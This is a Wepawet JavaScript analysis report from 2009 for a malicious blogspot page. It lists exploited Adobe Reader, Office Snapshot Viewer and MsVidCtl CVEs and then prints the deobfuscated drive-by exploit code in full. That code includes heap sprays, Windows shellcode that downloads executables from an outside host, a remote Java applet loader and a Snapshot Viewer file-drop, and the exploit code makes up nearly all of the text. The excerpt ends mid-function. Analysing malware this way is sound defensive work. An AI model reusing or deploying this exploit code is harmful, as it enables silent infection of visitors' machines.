Wepawet » JavaScript Report for http://bertilladingman36429.blogspot.com/

Analysis report for http://bertilladingman36429.blogspot.com/

Sample Overview

URL	http://bertilladingman36429.blogspot.com/
MD5	d55aea59cd61215efb5782772322b59d
Analysis Started	2009-10-09 12:04:39
Report Generated	2009-10-09 12:04:53
Jsand version	1.03.02

See the report for domain bertilladingman36429.blogspot.com.

Detection results

Detector	Result
Jsand 1.03.02	malicious

Exploits

Name	Description	Reference
Office Snapshot Viewer	The Microsoft Office Snapshot Viewer ActiveX control allows remote attackers to download arbitrary files to a client machine	CVE-2008-2463
Adobe Collab overflow	Multiple Adobe Reader and Acrobat buffer overflows	CVE-2007-5659
Adobe util.printf overflow	Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf	CVE-2008-2992
Adobe getIcon	Stack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab object	CVE-2009-0927
MsVidCtl Overflow	Overflow in Microsoft Video ActiveX Control via specially-crafted data parameter	CVE-2008-0015

Deobfuscation results

Evals

function aegjns(){
  if (1 == 2){
    setTimeout('location.href = "http://cnyswatmop.com"', 5000);
  }
  else {
    setTimeout('location.href = "http://cnyswatmop.com"', 9000);
  }
}
function biqty(){
  var acdrw = false;
  if (navigator.plugins && navigator.plugins.length){
    for (var bdnxy = 0; bdnxy < navigator.plugins.length; bdnxy ++ ){
      if (navigator.plugins[bdnxy].description.indexOf('Adobe Acrobat') !=- 1){
        acdrw = true;
        break ;
      }
      if (navigator.plugins[bdnxy].description.indexOf('Adobe PDF') !=- 1){
        acdrw = true;
        break ;
      }
    }
  }
  else if (window.ActiveXObject){
    var npwx = null;
    try {
      npwx = new ActiveXObject('AcroPDF.PDF');
    }
    catch (e){
    }
    if (!npwx){
      try {
        npwx = new ActiveXObject('PDF.PdfCtrl');
      }
      catch (e){
      }
    }
    if (npwx){
      acdrw = true;
    }
  }
  if (acdrw){
    var ua = navigator.userAgent.toLowerCase();
    if (ua.indexOf("firefox") !=- 1){
      var behuy = document.createElement('embed');
      behuy.setAttribute('src', './bgrx.pdf');
      behuy.setAttribute('href', './bgrx.pdf');
      behuy.setAttribute('type', 'application/pdf');
      behuy.setAttribute('width', 15);
      behuy.setAttribute('height', 19);
      behuy.setAttribute('style', 'display:none;');
      document.body.appendChild(behuy);
    }
    else {
      var behuy = document.createElement('iframe');
      behuy.setAttribute('src', './bgrx.pdf');
      behuy.setAttribute('width', 15);
      behuy.setAttribute('height', 20);
      behuy.setAttribute('style', 'display:none;');
      document.body.appendChild(behuy);
    }
    setTimeout(dlmt(), 425);
    return ;
  }
  dlmt();
  return ;
}
function dlmt(){
  var PlayerVersion = [0, 0, 0];
  if (navigator.plugins && navigator.mimeTypes.length){
    var x = navigator.plugins["Shockwave Flash"];
    if (x && x.description){
      PlayerVersion = x.description.replace(/([a-zA-Z]|\s)+/, "").replace(
      /(\s+r|\s+b[0-9]+)/, ".").split(".");
    }
  }
  else {
    try {
      var fv = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
      if (fv != null){
        PlayerVersion = fv.GetVariable("\$version").split(" ")[1].split(",");
      }
    }
    catch (e){
      cdjsvx();
      return ;
    }
  }
  var version1 = PlayerVersion[0] != null ? parseInt(PlayerVersion[0]) : 0;
  var version2 = PlayerVersion[1] != null ? parseInt(PlayerVersion[1]) : 0;
  var version3 = PlayerVersion[2] != null ? parseInt(PlayerVersion[2]) : 0;
  if (version1 == 9 && version3 < 124){
    var ua = navigator.userAgent.toLowerCase();
    if (ua.indexOf("firefox") !=- 1){
      var swfelement = document.createElement('embed');
      document.body.appendChild(swfelement);
      swfelement.width = '1';
      swfelement.height = '1';
      swfelement.src = './manual.swf';
      swfelement.type = 'application/x-shockwave-flash';
    }
    else {
      var swfelement = document.createElement('iframe');
      swfelement.setAttribute('src', './manual.swf');
      swfelement.setAttribute('width', 200);
      swfelement.setAttribute('height', 200);
      swfelement.setAttribute('style', 'display:none;');
      document.body.appendChild(swfelement);
    }
  }
  cdjsvx();
}
function cdjsvx(){
  var rwoLXUtl = '
<applet code="myf.y.AppletX.class" archive="http://pipisechka.com/sleep/sdfg.jar" width="3
00" height="300">' + 
  '<param name="data" value="http://pipisechka.com/sleep/dshdsgfh4.exe?jas">' + 
  '<param name="cc" value="1">' + '</applet>';
  var NZWhjVxX = document.createElement("div");
  NZWhjVxX.innerHTML = rwoLXUtl;
  document.body.appendChild(NZWhjVxX);
  fiqrvw();
}
function fiqrvw(){
  var shellcode = unescape("
%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u6473%u7367%u3567%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573
%u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D");
  var bigblock = unescape("%u9090%u9090");
  var headersize = 20;
  var slackspace = headersize + shellcode.length;
  while (bigblock.length < slackspace)bigblock += bigblock;
  var fillblock = bigblock.substring(0, slackspace);
  var block = bigblock.substring(0, bigblock.length - slackspace);
  while (block.length + slackspace < 0x40000){
    block = block + block + fillblock;
  }
  var memory = new Array();
  for (var i = 0; i < 350; i ++ ){
    memory[i] = block + shellcode;
  }
  var fnpu = document.createElement('object');
  fnpu.setAttribute('width', 1);
  fnpu.setAttribute('height ', 1);
  fnpu.setAttribute('data', './cilpqxds.jpg');
  fnpu.setAttribute('classid', 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF');
  document.body.appendChild(fnpu);
  qsuxy();
}
function qsuxy(){
  var hjlm;
  var fhim;
  var dhqry = new Array();
  dhqry[0] = 'c:/Program Files/Outlook Express/wab.exe';
  dhqry[1] = 'd:/Program Files/Outlook Express/wab.exe';
  dhqry[2] = 'e:/Program Files/Outlook Express/wab.exe';
  try {
    var fhim = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
  }
  catch (e){
    try {
      var fhim = document.createElement('object');
      fhim.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
      fhim.setAttribute('id', 'fhim');
      fhim.setAttribute('width', '1');
      fhim.setAttribute('height', '1');
      document.body.appendChild(fhim);
    }
    catch (e){
      aegjns();
      return ;
    }
  }
  if (fhim = '[object]'){
    for (hjlmin dhqry){
      try {
        fhim = new ActiveXObject('snpvw.Snapshot Viewer Control.1');
        var buf = dhqry[hjlm];
        fhim.Zoom = 0;
        fhim.ShowNavigationButtons = false;
        fhim.AllowContextMenu = false;
        fhim.SnapshotPath = 'http://pipisechka.com/sleep/cdkpsv7.exe';
        fhim.CompressedPath = buf;
        fhim.PrintSnapshot();
        var afhiqs = document.createElement('iframe');
        afhiqs.setAttribute('id', 'afhiqs');
        afhiqs.setAttribute('src', 'ldap://127.0.0.1');
        afhiqs.setAttribute('width', 1);
        afhiqs.setAttribute('height', 1);
        afhiqs.setAttribute('style', 'display:none;');
        document.body.appendChild(afhiqs);
        var hkopw = setInterval(adjqv(), 2100);
      }
      catch (e){
        aegjns();
        return ;
      }
    }
  }
  aegjns();
  return ;
}
function adjqv(){
  if (fhim.readyState == 4){
    clearInterval(hkopw);
  }
}
biqty();

(repeated 1 time)

function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
    yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}
function util_printf(){
  var payload = unescape("
%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u6361%u716D%u7875%u2E32%u7865%u0065%u7468%u7074%u2F3A%u702F%u7069%u7369
%u6365%u6B68%u2E61%u6F63%u2F6D%u6C73%u6565%u2F70%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000"
  );
  var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload;
  var bigblock = unescape("%u0A0A%u0A0A");
  var headersize = 20;
  var spray = headersize + heapblock.length;
  while (bigblock.length < spray){
    bigblock += bigblock;
  }
  var fillblock = bigblock.substring(0, spray);
  var block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000){
    block = block + block + fillblock;
  }
  var mem_array = new Array();
  for (var i = 0; i < 1400; i ++ ){
    mem_array[i] = block + heapblock;
  }
  var num = 
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
  util.printf("%45000f", num);
}
function collab_email(){
  var shellcode = unescape("
%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u7066%u7674%u2E32%u7865%u0065%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365
%u6B68%u2E61%u6F63%u2F6D%u6C73%u6565%u2F70%u6C63%u6369%u2E6B%u6870%u3F70%u3D72%u0000");
  var mem_array = new Array();
  var cc = 0x0c0c0c0c;
  var addr = 0x400000;
  var sc_len = shellcode.length * 2;
  var len = addr - (sc_len + 0x38);
  var yarsp = unescape("%u9090%u9090");
  yarsp = fix_it(yarsp, len);
  var count2 = (cc - 0x400000) / addr;
  for (var count = 0; count < count2; count ++ ){
    mem_array[count] = yarsp + shellcode;
  }
  var overflow = unescape("%u0c0c%u0c0c");
  while (overflow.length < 44952){
    overflow += overflow;
  }
  this .collabStore = Collab.collectEmailInfo({
    subj : "", msg : overflow
  }
  );
}
function collab_geticon(){
  if (app.doc.Collab.getIcon){
    var arry = new Array();
    var vvpethya = unescape("
%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u6E67%u6962%u327A%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573
%u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D");
    var hWq500CN = vvpethya.length * 2;
    var len = 0x400000 - (hWq500CN + 0x38);
    var yarsp = unescape("%u9090%u9090");
    yarsp = fix_it(yarsp, len);
    var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
    for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
      arry[vqcQD96y] = yarsp + vvpethya;
    }
    var tUMhNbGw = unescape("%09");
    while (tUMhNbGw.length < 0x4000){
      tUMhNbGw += tUMhNbGw;
    }
    tUMhNbGw = "N." + tUMhNbGw;
    app.doc.Collab.getIcon(tUMhNbGw);
  }
}
function pdf_start(){
  var version = app.viewerVersion.toString();
  version = version.replace(/\D/g, '');
  var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 && 
  varsion_array[2] < 3)){
    util_printf();
  }
  if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 && 
  varsion_array[2] < 2)){
    collab_email();
  }
  if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
    collab_geticon();
  }
}
pdf_start();

(repeated 1 time)

function fix_it(yarsp, len){
  while (yarsp.length * 2 < len){
    yarsp += yarsp;
  }
  yarsp = yarsp.substring(0, len / 2);
  return yarsp;
}
function util_printf(){
  var payload = unescape("
%uEBE9%u0001%u5600%uA164%u0030%u0000%u408B%u8B0C%u1C70%u8BAD%u0840%uC35E%u8B55%u8BEC%u0845
%u3352%uC1D2%u03C2%u1032%u8040%u0038%uF575%uC28B%u5D5A%u04C2%u5500%uEC8B%u5151%u5653%u6057
%u5D8B%u3308%u8BC0%u0C75%uFE8B%u7603%u8B3C%u784E%uCF03%u518B%u521C%u518B%u5224%u718B%u4E14
%u7589%u8BFC%u2071%uF703%u4A99%u42AD%u3B60%uFC55%u0475%uC033%u37EB%uFF33%u4503%u970C%uCF8B
%u75AE%u2BFD%u4FF9%uE851%uFF94%uFFFF%uC33B%u7461%uEB02%u8BD9%u0C45%u5E92%uF203%uE0D1%uC603
%uC933%uB70F%u5F08%uE1C1%u0302%u03CA%u8BCF%u0301%u89C2%uF845%u8B61%uF845%u5E5F%uC95B%u55C3
%uEC8B%uE851%uFF49%uFFFF%u6850%u60E8%u04BF%u6CE8%uFFFF%u33FF%u52D2%uFF52%u0875%uD0FF%u4589
%u8BFC%uFC45%uC3C9%u8B55%u83EC%u0CEC%u458D%u50F4%u45C6%u75F4%u45C6%u72F5%u45C6%u6CF6%u45C6
%u6DF7%u45C6%u6FF8%u45C6%u6EF9%u45C6%u2EFA%u45C6%u64FB%u45C6%u6CFC%u45C6%u6CFD%u45C6%u00FE
%uA0E8%uFFFF%u50FF%u5D68%u118A%uE816%uFF15%uFFFF%uC483%u850C%u74C0%u6A15%u6A00%uFF00%u0C75
%u75FF%u6A08%uFF00%u85D0%u75C0%u4003%uC3C9%uC033%uC3C9%u3357%u8BC0%u244C%u8B0C%u247C%uFC08
%uAAF3%uC35F%u4C8B%u0424%u3980%u8B00%u74C1%u4006%u3880%u7500%u2BFA%uC3C1%u8B55%u83EC%u64EC
%u8D53%uF045%u3357%u50DB%u45C6%u6BF0%u45C6%u65F1%u45C6%u72F2%u45C6%u6EF3%u45C6%u65F4%u45C6
%u6CF5%u45C6%u33F6%u45C6%u32F7%u45C6%u2EF8%u45C6%u64F9%u45C6%u6CFA%u45C6%u6CFB%u5D88%uE8FC
%uFF0B%uFFFF%u6850%u4368%u8EF9%u80E8%uFFFE%u8BFF%u8DF8%u9C45%u446A%uE850%uFF7E%uFFFF%u458D
%u6AE0%u5010%u73E8%uFFFF%u83FF%u1CC4%u458D%u50E0%u458D%u509C%u5353%u5353%u5353%u75FF%uC708
%u9C45%u0044%u0000%uFF53%u5FD7%uB60F%u5BC0%uC3C9%u8B55%u51EC%u5351%u5756%u426A%u72E8%u0000
%u8B00%u33D8%u85F6%u59DB%u45C7%u61F8%u652E%uC778%uFC45%u0065%u0000%u567E%u458D%u50F8%uE856
%u0051%u0000%u5059%uB1E8%uFFFE%u85FF%u59C0%u7459%u8D39%u0146%uE850%u003B%u0000%uF88B%u458D
%u50F8%u21E8%uFFFF%u85FF%u59C0%u7459%u570C%u01E8%uFFFF%u59FF%u44C6%uFF38%u5073%u458D%uFEF8
%u5800%u458D%u50F8%uE857%uFE74%uFFFF%u5959%u4646%uF33B%uAA7C%u5E5F%uC95B%u55C3%uEC8B%u5351
%u6066%u32B1%u00E8%u0000%u5800%u0838%u0374%uEB40%u40F9%u5D8B%u8008%u42FB%u0875%uDB33%u188A
%uC38B%u17EB%u1838%u1176%u3340%u84C9%u74DB%u400C%u0838%uFB75%uFE40%uEBCB%u33F2%u89C0%uFC45
%u458B%u5BFC%uC3C9%u0232%u7468%u7074%u2F3A%u702F%u7069%u7369%u6365%u6B68%u2E61%u6F63%u2F6D
%u6C73%u6565%u2F70%u656C%u7A6B%u3276%u652E%u6578%u6800%u7474%u3A70%u2F2F%u6970%u6970%u6573
%u6863%u616B%u632E%u6D6F%u732F%u656C%u7065%u632F%u696C%u6B63%u702E%u7068%u723F%u003D");
  var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A")var heapblock = nop + payload;
  var bigblock = unescape("%u0A0A%u0A0A");
  var headersize = 20;
  var spray = headersize + heapblock.length;
  while (bigblock.length < spray){
    bigblock += bigblock;
  }
  var fillblock = bigblock.substring(0, spray);
  var block = bigblock.substring(0, bigblock.length - spray);
  while (block.length + spray < 0x40000){
    block = block + block + fillblock;
  }
  var mem_array = new Array();
  for (var i = 0; i < 1400; i ++ ){
    mem_array[i] = block + heapblock;
  }
  var num = 
129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
88888888888888888888888888;
  util.printf("%45000f", num);
}
function collab_email(){
  var shellcode = unescape("
